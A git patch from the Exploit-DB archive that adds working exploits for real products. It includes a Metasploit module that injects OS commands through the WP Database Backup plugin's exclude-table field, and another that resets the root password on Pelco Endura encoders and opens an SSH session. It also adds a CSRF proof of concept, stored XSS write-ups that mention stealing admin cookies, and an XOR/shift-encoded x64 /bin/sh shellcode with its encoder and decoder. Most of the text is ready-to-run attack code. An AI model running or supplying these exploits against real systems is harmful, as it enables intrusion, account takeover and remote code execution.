From 852694f9827cd3e573158a36d6431b68a2c38a9c Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 30 Jul 2019 05:02:12 +0000 Subject: [PATCH] DB: 2019-07-30 6 changes to exploits/shellcodes Schneider Electric Pelco Endura NET55XX Encoder - Authentication Bypass (Metasploit) WP Database Backup < 5.2 - Remote Code Execution (Metasploit) WordPress Plugin Simple Membership 3.8.4 - Cross-Site Request Forgery WordPress Theme Real Estate 2.8.9 - Cross-Site Scripting GigToDo 1.3 - Cross-Site Scripting Linux/x86 - NOT +SHIFT-N+ XOR-N Encoded /bin/sh Shellcode --- exploits/php/remote/47187.rb | 194 ++++++++++++++++++++++++++++++++ exploits/php/webapps/47182.html | 24 ++++ exploits/php/webapps/47184.txt | 33 ++++++ exploits/php/webapps/47185.txt | 39 +++++++ exploits/unix/remote/47186.rb | 160 ++++++++++++++++++++++++++ files_exploits.csv | 5 + files_shellcodes.csv | 1 + shellcodes/linux_x86-64/47183.c | 167 +++++++++++++++++++++++++++ 8 files changed, 623 insertions(+) create mode 100755 exploits/php/remote/47187.rb create mode 100644 exploits/php/webapps/47182.html create mode 100644 exploits/php/webapps/47184.txt create mode 100644 exploits/php/webapps/47185.txt create mode 100755 exploits/unix/remote/47186.rb create mode 100644 shellcodes/linux_x86-64/47183.c diff --git a/exploits/php/remote/47187.rb b/exploits/php/remote/47187.rb new file mode 100755 index 000000000..5356b4ab3 --- /dev/null +++ b/exploits/php/remote/47187.rb @@ -0,0 +1,194 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::CmdStager + include Msf::Exploit::Powershell + include Msf::Exploit::Remote::HTTP::Wordpress + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'WP Database Backup RCE', + 'Description' => %q( + There exists a command injection vulnerability in the Wordpress plugin + `wp-database-backup` for versions < 5.2. + + For the backup functionality, the plugin generates a `mysqldump` command + to execute. The user can choose specific tables to exclude from the backup + by setting the `wp_db_exclude_table` parameter in a POST request to the + `wp-database-backup` page. The names of the excluded tables are included in + the `mysqldump` command unsanitized. Arbitrary commands injected through the + `wp_db_exclude_table` parameter are executed each time the functionality + for creating a new database backup are run. + + Authentication is required to successfully exploit this vulnerability. + ), + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mikey Veenstra / Wordfence', # Vulnerability Discovery + 'Shelby Pace' # Metasploit module + ], + 'References' => + [ + [ 'URL', 'https://www.wordfence.com/blog/2019/05/os-command-injection-vulnerability-patched-in-wp-database-backup-plugin/' ], + ], + 'Platform' => [ 'win', 'linux' ], + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'Targets' => + [ + [ + 'Windows', + { + 'Platform' => 'win', + 'Arch' => [ ARCH_X86, ARCH_X64 ] + } + ], + [ + 'Linux', + { + 'Platform' => 'linux', + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'CmdStagerFlavor' => 'printf' + } + ] + ], + 'DisclosureDate' => '2019-04-24', + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('USERNAME', [ true, 'Wordpress username', '' ]), + OptString.new('PASSWORD', [ true, 'Wordpress password', '' ]), + OptString.new('TARGETURI', [ true, 'Base path to Wordpress installation', '/' ]) + ]) + end + + def check + return CheckCode::Unknown unless wordpress_and_online? + + changelog_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-database-backup', 'readme.txt') + res = send_request_cgi( + 'method' => 'GET', + 'uri' => changelog_uri + ) + + if res && res.code == 200 + version = res.body.match(/=+\s(\d+\.\d+)\.?\d*\s=/) + return CheckCode::Detected unless version && version.length > 1 + + vprint_status("Version of wp-database-backup detected: #{version[1]}") + return CheckCode::Appears if Gem::Version.new(version[1]) < Gem::Version.new('5.2') + end + CheckCode::Safe + end + + def exploit + cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD']) + fail_with(Failure::NoAccess, 'Unable to log into Wordpress') unless cookie + + res = create_exclude_table(cookie) + nonce = get_nonce(res) + create_backup(cookie, nonce) + + clear_exclude_table(cookie) + end + + def create_exclude_table(cookie) + @exclude_uri = normalize_uri(target_uri.path, 'wp-admin', 'tools.php') + res = send_request_cgi( + 'method' => 'GET', + 'uri' => @exclude_uri, + 'cookie' => cookie, + 'vars_get' => { 'page' => 'wp-database-backup' } + ) + + fail_with(Failure::NotFound, 'Unable to reach the wp-database-backup settings page') unless res && res.code == 200 + print_good('Reached the wp-database-backup settings page') + if datastore['TARGET'] == 1 + comm_payload = generate_cmdstager(concat_operator: ' && ', temp: './') + comm_payload = comm_payload.join('&&') + comm_payload = comm_payload.gsub('\'', '') + comm_payload = "; #{comm_payload} ;" + else + comm_payload = " & #{cmd_psh_payload(payload.encoded, payload.arch, remove_comspec: true, encode_final_payload: true)} & ::" + end + + table_res = send_request_cgi( + 'method' => 'POST', + 'uri' => @exclude_uri, + 'cookie' => cookie, + 'vars_post' => + { + 'wpsetting' => 'Save', + 'wp_db_exclude_table[wp_comment]' => comm_payload + } + ) + + fail_with(Failure::UnexpectedReply, 'Failed to submit payload as an excluded table') unless table_res && table_res.code + print_good('Successfully added payload as an excluded table') + + res.get_html_document + end + + def get_nonce(response) + fail_with(Failure::UnexpectedReply, 'Failed to get a proper response') unless response + + div_res = response.at('p[@class="submit"]') + fail_with(Failure::NotFound, 'Failed to find the element containing the nonce') unless div_res + + wpnonce = div_res.to_s.match(/_wpnonce=([0-9a-z]*)/) + fail_with(Failure::NotFound, 'Failed to retrieve the wpnonce') unless wpnonce && wpnonce.length > 1 + + wpnonce[1] + end + + def create_backup(cookie, nonce) + first_res = send_request_cgi( + 'method' => 'GET', + 'uri' => @exclude_uri, + 'cookie' => cookie, + 'vars_get' => + { + 'page' => 'wp-database-backup', + '_wpnonce' => nonce, + 'action' => 'createdbbackup' + } + ) + + res = send_request_cgi( + 'method' => 'GET', + 'uri' => @exclude_uri, + 'cookie' => cookie, + 'vars_get' => + { + 'page' => 'wp-database-backup', + 'notification' => 'create' + } + ) + + fail_with(Failure::UnexpectedReply, 'Failed to create database backup') unless res && res.code == 200 && res.body.include?('Database Backup Created Successfully') + print_good('Successfully created a backup of the database') + end + + def clear_exclude_table(cookie) + res = send_request_cgi( + 'method' => 'POST', + 'uri' => @exclude_uri, + 'cookie' => cookie, + 'vars_post' => + { + 'wpsetting' => 'Save', + 'wp_db_exclude_table[wp_comment]' => 'wp_comment' + } + ) + + fail_with(Failure::UnexpectedReply, 'Failed to delete the remove the payload from the excluded tables') unless res && res.code == 200 + print_good('Successfully deleted the payload from the excluded tables list') + end +end \ No newline at end of file diff --git a/exploits/php/webapps/47182.html b/exploits/php/webapps/47182.html new file mode 100644 index 000000000..0127ca4ca --- /dev/null +++ b/exploits/php/webapps/47182.html @@ -0,0 +1,24 @@ +# Exploit Title: Cross Site Request Forgery in Wordpress Simple Membership plugin +# Date: 2019-07-27 +# Exploit Author: rubyman +# Vendor Homepage: https://wordpress.org/plugins/simple-membership/ +# wpvulndb : https://wpvulndb.com/vulnerabilities/9482 +# Version: 3.8.4 +# Tested on: Windows 8.1 +# CVE : CVE-2019-14328 + +# +# Change localhost to your desired host +# + + + + +
+ + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/47184.txt b/exploits/php/webapps/47184.txt new file mode 100644 index 000000000..bc5b6670d --- /dev/null +++ b/exploits/php/webapps/47184.txt @@ -0,0 +1,33 @@ +# Exploit Title: Real Estate 7 - Real Estate WordPress Theme v2.8.9 +Persistent XSS Injection +# Google Dork: inurl:"/wp-content/themes/realestate-7/" +# Date: 2019/07/20 +# Author: m0ze +# Vendor Homepage: https://contempothemes.com +# Software Link: https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778 +# Version: <= 2.8.9 +# Tested on: NginX +# CVE: - +# CWE: CWE-79 + +Details & Description: +The «Real Estate 7» premium WordPress theme is vulnerable to persistent XSS +injection that allows an attacker to inject JavaScript or HTML code into +the website front-end. + +Special Note: +- 7.151 Sales +- If pre moderation is enabled, then u have a huge chance to steal an admin +or moderator cookies. +- U can edit any existed listing on the website by changing the unique ID +-> https://site.com/edit-listing/?listings=XXX (where XXX is WordPress post +ID, u can find it inside tag class). + +PoC [Persistent XSS Injection]: +First of all, register a new account as a seller or agent, log in and +choose free membership package @ the dashboard. After that u'll be able to +submit a new listing -> https://site.com/submit-listing/ +For persistent XSS injection u need to add ur payload inside the «Vitrual +Tour Embed» text area (on the «DETAILS» step) and then press «Submit» +button. +Example: \ No newline at end of file diff --git a/exploits/php/webapps/47185.txt b/exploits/php/webapps/47185.txt new file mode 100644 index 000000000..1fbc46967 --- /dev/null +++ b/exploits/php/webapps/47185.txt @@ -0,0 +1,39 @@ +# Exploit Title: GigToDo - Freelance Marketplace Script v1.3 Persistent XSS Injection +# Google Dork: - +# Date: 2019/07/28 +# Author: m0ze +# Vendor Homepage: https://www.gigtodoscript.com +# Software Link: https://codecanyon.net/item/gigtodo-freelance-marketplace-script/23855397 +# Version: <= 1.3 +# Tested on: NginX/1.15.10 +# CVE: - +# CWE: CWE-79 + + +Details & Description: +The «GigToDo - Freelance Marketplace Script» web-application is vulnerable +to reflected and persistent XSS injections that allows an attacker to +inject JavaScript/HTML code into the front-end, redirect visitor to another +website or steal admin cookies. + + +PoC [Persistent XSS Injection]: +Register a new account, log in and go to the +https://www.site.com/proposals/create_proposal page. Vulnerable text area +is «Proposal's Description», so paste your payload inside, fill in other +fields and save the data TWICE or your payload WILL NOT WORK. So literally +paste your payload inside the «Proposal's Description» text area and scroll +down to «Update Proposal» button, press it and your data will be saved. +After that u'll be redirected to +https://www.site.com/proposals/view_proposals.php page. Select your created +proposal and press green square dropdown menu on the right («Actions» +column) and click on «Edit» link. After that just don't change anything, +scroll down to «Update Proposal» button, press it and your data will be +saved ONE MORE TIME. That's it, now your payload will work. +Example #1:

m0ze

1"--> +Example #2:

m0ze

1"--> \ No newline at end of file diff --git a/exploits/unix/remote/47186.rb b/exploits/unix/remote/47186.rb new file mode 100755 index 000000000..2a7d817ca --- /dev/null +++ b/exploits/unix/remote/47186.rb @@ -0,0 +1,160 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Udp + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Exploit::Remote::SSH + + def initialize(info={}) + super(update_info(info, + 'Name' => "Schneider Electric Pelco Endura NET55XX Encoder", + 'Description' => %q( + This module exploits inadequate access controls within the webUI to enable + the SSH service and change the root password. This module has been tested successfully + on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500, NET5516, NET550 versions. + ), + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Lucas Dinucci ', + 'Vitor Esperança ' + ], + 'References' => + [ + ['CVE', '2019-6814'], + ['URL', 'https://www.schneider-electric.com/en/download/document/SEVD-2019-134-01/'] + ], + 'Payload' => + { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find' + } + }, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => [ [ "Universal", {} ] ], + 'Privileged' => true, + 'DisclosureDate' => "Jan 25 2019", + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('NEW_PASSWORD', [ true, 'New password to be set for the root account', Rex::Text.rand_text_alphanumeric(16)]), + OptInt.new('TIMEOUT', [ true, 'Timeout for the requests', 10]) + ] + ) + + register_advanced_options( + [ + OptInt.new('UDP_PORT', [ true, 'UDP port for the ONVIF service', 3702]), + OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), + OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) + ] + ) + end + + def new_password + datastore['NEW_PASSWORD'] + end + + def check + xmlPayload = ''\ + ''\ + '
'\ + 'http://schemas.xmlsoap.org/ws/2005/04/discovery/Probe'\ + 'uuid:f3d577a3-431f-4450-ab45-b480042b9c74'\ + ''\ + 'http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous'\ + ''\ + 'urn:schemas-xmlsoap-org:ws:2005:04:discovery'\ + '
'\ + ''\ + ''\ + 'dp0:NetworkVideoTransmitter'\ + ''\ + ''\ + '' + + connect_udp(true, {'RPORT' => datastore['UDP_PORT']}) + udp_sock.put(xmlPayload) + resp = [] + resp << udp_sock.get(datastore['TIMEOUT']) + xmlResponse = resp.join(',') + disconnect_udp + if xmlResponse.include?("NET5501") || xmlResponse.include?("NET5501-I") || xmlResponse.include?("NET5501-XT") || xmlResponse.include?("NET5504") || xmlResponse.include?("NET5500") || xmlResponse.include?("NET5516") || xmlResponse.include?("NET5508") + return Exploit::CheckCode::Appears + end + CheckCode::Safe + end + + def change_password + print_status("#{peer} - Attempt to change the root password...") + post = {"enable": true, "passwd": new_password, "userid": "root"}.to_json + + login = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh'), + 'data' => post, + 'headers' => + { + 'Cookie' => 'live_onoff=0; userid=admin; grpid=ADMIN; permission=2147483647', + 'Content-Type' => 'application/json;charset=utf-8' + } + }, timeout=datastore['TIMEOUT']) + + fail_with(Failure::UnexpectedReply, "Failed to change root password") unless login && login.code == 200 + print_good("#{rhost}:80 - Successfully changed the root password...") + print_good("#{rhost}:80 - New credentials: User: root / Password: #{new_password}") + end + + def do_login + change_password + print_status("#{rhost}:22 - Attempt to start a SSH connection...") + factory = ssh_socket_factory + opts = { + :auth_methods => ['password', 'keyboard-interactive'], + :port => 22, + :use_agent => false, + :config => true, + :password => new_password, + :proxy => factory, + :non_interactive => true, + :verify_host_key => :never + } + opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + begin + ssh = nil + ::Timeout.timeout(datastore['SSH_TIMEOUT']) do + ssh = Net::SSH.start(datastore['RHOST'], 'root', opts) + end + rescue Rex::ConnectionError + rescue Net::SSH::Disconnect, ::EOFError + print_error "#{rhost}:22 SSH - Disconnected during negotiation" + rescue ::Timeout::Error + print_error "#{rhost}:22 SSH - Timed out during negotiation" + rescue Net::SSH::AuthenticationFailed + print_error "#{rhost}:22 SSH - Failed authentication" + rescue Net::SSH::Exception => e + print_error "#{rhost}:22 SSH Error: #{e.class} : #{e.message}" + end + if ssh + conn = Net::SSH::CommandStream.new(ssh) + return conn + end + end + + def exploit + conn = do_login + if conn + print_good("#{rhost}:22 - Session established ") + handler(conn.lsock) + end + end +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index c893983f3..34d3fec5e 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -17582,6 +17582,8 @@ id,file,description,date,author,type,platform,port 47130,exploits/windows/remote/47130.txt,"MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow",2019-07-17,hyp3rlinx,remote,windows, 47137,exploits/windows_x86/remote/47137.py,"MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)",2019-07-19,sasaga92,remote,windows_x86, 47155,exploits/multiple/remote/47155.txt,"Trend Micro Deep Discovery Inspector IDS - Security Bypass",2019-07-24,hyp3rlinx,remote,multiple, +47186,exploits/unix/remote/47186.rb,"Schneider Electric Pelco Endura NET55XX Encoder - Authentication Bypass (Metasploit)",2019-07-29,Metasploit,remote,unix, +47187,exploits/php/remote/47187.rb,"WP Database Backup < 5.2 - Remote Code Execution (Metasploit)",2019-07-29,Metasploit,remote,php,80 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -41555,3 +41557,6 @@ id,file,description,date,author,type,platform,port 47179,exploits/jsp/webapps/47179.py,"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution",2019-07-26,"Wietse Boonstra",webapps,jsp, 47180,exploits/jsp/webapps/47180.rb,"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)",2019-07-26,"Wietse Boonstra",webapps,jsp,443 47181,exploits/jsp/webapps/47181.txt,"Ahsay Backup 7.x - 8.1.1.50 - XML External Entity Injection",2019-07-26,"Wietse Boonstra",webapps,jsp,80 +47182,exploits/php/webapps/47182.html,"WordPress Plugin Simple Membership 3.8.4 - Cross-Site Request Forgery",2019-07-29,rubyman,webapps,php,80 +47184,exploits/php/webapps/47184.txt,"WordPress Theme Real Estate 2.8.9 - Cross-Site Scripting",2019-07-29,m0ze,webapps,php,80 +47185,exploits/php/webapps/47185.txt,"GigToDo 1.3 - Cross-Site Scripting",2019-07-29,m0ze,webapps,php,80 diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 0c7cfaa3a..b91c0e8ad 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -989,3 +989,4 @@ id,file,description,date,author,type,platform 47068,shellcodes/linux_x86/47068.c,"Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)",2019-07-01,"Kirill Nikolaev",shellcode,linux_x86 47108,shellcodes/linux_x86/47108.txt,"Linux/x86 - chmod 666 /etc/passwd & chmod 666 /etc/shadow Shellcode (61 bytes)",2019-07-12,"Xavier Invers Fornells",shellcode,linux_x86 47151,shellcodes/linux_x86-64/47151.c,"Linux/x86_64 - Wget Linux Enumeration Script Shellcode (155 Bytes)",2019-07-23,"Kağan Çapar",shellcode,linux_x86-64 +47183,shellcodes/linux_x86-64/47183.c,"Linux/x86 - NOT +SHIFT-N+ XOR-N Encoded /bin/sh Shellcode",2019-07-29,"Pedro Cabral",shellcode,linux_x86-64 diff --git a/shellcodes/linux_x86-64/47183.c b/shellcodes/linux_x86-64/47183.c new file mode 100644 index 000000000..58dc7dafe --- /dev/null +++ b/shellcodes/linux_x86-64/47183.c @@ -0,0 +1,167 @@ +/* +######################################## description ######################################## + +; Title : X64 [NOT +SHIFT-N+ XOR-N] encoded /bin/sh - shellcode +; Author : Pedro Cabral +; Twitter : @CabrallPedro +; LinkedIn : https://www.linkedin.com/in/pedro-cabral1992 +; SLAE ID : SLAE64 - 1603 +; Purpose : spawn /bin/sh shell +; Tested On : Ubuntu 16.04.6 LTS +; Arch : x64 +; Size : 168 bytes + +########################################## sh.asm ########################################### + +global _start + +section .text + +_start: + xor rax, rax + push rax ; push null + mov rbx, 0x68732f2f6e69622f ;/bin//sh in reverse + push rbx ; push to the stack + mov rdi, rsp ; store the /bin//sh on rdi + push rax ; push null + mov rdx, rsp ; set rdx + push rdi ; push the address of /bin//sh + mov rsi, rsp ; set rsi + add rax, 59 ; rax = 59 (execve) + syscall + + +#################################### original shellcode ##################################### + +pedro@ubuntu>nasm -felf64 sh.asm -o sh.o +pedro@ubuntu>ld -N -o sh sh.o +pedro@ubuntu>echo;objdump -d ./sh.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g';echo + +"\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05" + + +######################################## encode.py ######################################## + +#!/usr/bin/python + +import sys + +if len(sys.argv) != 3: + print "Usage : python encode.py " + sys.exit(0) + +shift = int(sys.argv[1]) +xor = int(sys.argv[2]) + +shellcode = ("\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05") + + +# addition to the inicial of the shellcode the SHIFT and XOR values +encoded_shellcode ="" +encoded_shellcode += '0x01' #prevent null bytes on the shellcode +encoded_shellcode += '%02x, ' %shift +encoded_shellcode += '0x' +encoded_shellcode += '%02x, ' %xor + +# [NOT + SHL-N + XOR-N] encoded shellcode +for i in bytearray(shellcode): + new = ~i & 0xff + new = new << shift + new = new ^ xor + encoded_shellcode += '0x' + encoded_shellcode += '%02x, ' %new + +# end of shellcode +encoded_shellcode += '0x' +encoded_shellcode += '%02x, ' %xor +encoded_shellcode += '0x' +encoded_shellcode += '%02x' %xor + +# print encoded shellcode +print encoded_shellcode + +#################################### Encoded Shellcode ##################################### + +pedro@ubuntu>python encoder.py 4 1337 +0x0104, 0x539, 0xe49, 0x9d9, 0x6c9, 0xfc9, 0xe49, 0x179, 0x839, 0xce9, 0xc59, 0xc29, 0x839, 0x839, 0xdf9, 0xc49, 0xff9, 0xe49, 0x259, 0x4b9, 0xfc9, 0xe49, 0x259, 0x4e9, 0xfb9, 0xe49, 0x259, 0x4a9, 0xe49, 0x2f9, 0x6c9, 0x979, 0xa39, 0xa99, 0x539, 0x539 + +####################################### decoder.asm ######################################## + +global _start + +section .text + +_start: + + jmp decoder + encoded : dw 0x0104, 0x539, 0xe49, 0x9d9, 0x6c9, 0xfc9, 0xe49, 0x179, 0x839, 0xce9, 0xc59, 0xc29, 0x839, 0x839, 0xdf9, 0xc49, 0xff9, 0xe49, 0x259, 0x4b9, 0xfc9, 0xe49, 0x259, 0x4e9, 0xfb9, 0xe49, 0x259, 0x4a9, 0xe49, 0x2f9, 0x6c9, 0x979, 0xa39, 0xa99, 0x539, 0x539 + +decoder: + lea rsi, [rel encoded] + + xor rcx, rcx + xor r9,r9 + xor r10,r10 + + mov word cx, [rsi] + inc rsi + inc rsi + mov word r9w, [rsi] + inc rsi + inc rsi + push rsi + mov rdi, rsi +main: ; to deal with 0xff on the original shellcode + mov word r10w,[rsi] + xor r10w, r9w + jz second_check +main2: + shr r10, cl + not word r10w + mov byte [rdi], r10b + inc rsi + inc rsi + inc rdi + jmp short main + +second_check: + mov word r10w, [rsi+2] + xor r10w, r9w + jz call_encoded + mov word r10w, [rsi] + xor r10w, r9w + jmp main2 + +call_encoded: + call [rsp] + +###################################### final shellcode ###################################### + +pedro@ubuntu>nasm -felf64 decoder.asm -o decoder.o +pedro@ubuntu>echo;objdump -d ./decoder.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g';echo + +"\xeb\x48\x04\x01\x39\x05\x49\x0e\xd9\x09\xc9\x06\xc9\x0f\x49\x0e\x79\x01\x39\x08\xe9\x0c\x59\x0c\x29\x0c\x39\x08\x39\x08\xf9\x0d\x49\x0c\xf9\x0f\x49\x0e\x59\x02\xb9\x04\xc9\x0f\x49\x0e\x59\x02\xe9\x04\xb9\x0f\x49\x0e\x59\x02\xa9\x04\x49\x0e\xf9\x02\xc9\x06\x79\x09\x39\x0a\x99\x0a\x39\x05\x39\x05\x48\x8d\x35\xb1\xff\xff\xff\x48\x31\xc9\x4d\x31\xc9\x4d\x31\xd2\x66\x8b\x0e\x48\xff\xc6\x48\xff\xc6\x66\x44\x8b\x0e\x48\xff\xc6\x48\xff\xc6\x56\x48\x89\xf7\x66\x44\x8b\x16\x66\x45\x31\xca\x74\x15\x49\xd3\xea\x66\x41\xf7\xd2\x44\x88\x17\x48\xff\xc6\x48\xff\xc6\x48\xff\xc7\xeb\xe1\x66\x44\x8b\x56\x02\x66\x45\x31\xca\x74\x0a\x66\x44\x8b\x16\x66\x45\x31\xca\xeb\xd6\xff\x14\x24" + +pedro@ubuntu>gcc -fno-stack-protector -z execstack testShellcode.c -o testShellcode +pedro@ubuntu>./testShellcode +Shellcode Length: 168 +$ whoami +pedro +*/ + + +#include +#include + + +unsigned char code[] = \ +"\xeb\x48\x04\x01\x39\x05\x49\x0e\xd9\x09\xc9\x06\xc9\x0f\x49\x0e\x79\x01\x39\x08\xe9\x0c\x59\x0c\x29\x0c\x39\x08\x39\x08\xf9\x0d\x49\x0c\xf9\x0f\x49\x0e\x59\x02\xb9\x04\xc9\x0f\x49\x0e\x59\x02\xe9\x04\xb9\x0f\x49\x0e\x59\x02\xa9\x04\x49\x0e\xf9\x02\xc9\x06\x79\x09\x39\x0a\x99\x0a\x39\x05\x39\x05\x48\x8d\x35\xb1\xff\xff\xff\x48\x31\xc9\x4d\x31\xc9\x4d\x31\xd2\x66\x8b\x0e\x48\xff\xc6\x48\xff\xc6\x66\x44\x8b\x0e\x48\xff\xc6\x48\xff\xc6\x56\x48\x89\xf7\x66\x44\x8b\x16\x66\x45\x31\xca\x74\x15\x49\xd3\xea\x66\x41\xf7\xd2\x44\x88\x17\x48\xff\xc6\x48\xff\xc6\x48\xff\xc7\xeb\xe1\x66\x44\x8b\x56\x02\x66\x45\x31\xca\x74\x0a\x66\x44\x8b\x16\x66\x45\x31\xca\xeb\xd6\xff\x14\x24"; + +void main(){ + printf("Shellcode Length: %zu\n",strlen(code)); + + int (*ret)() = (int(*)())code; + + ret(); + +} \ No newline at end of file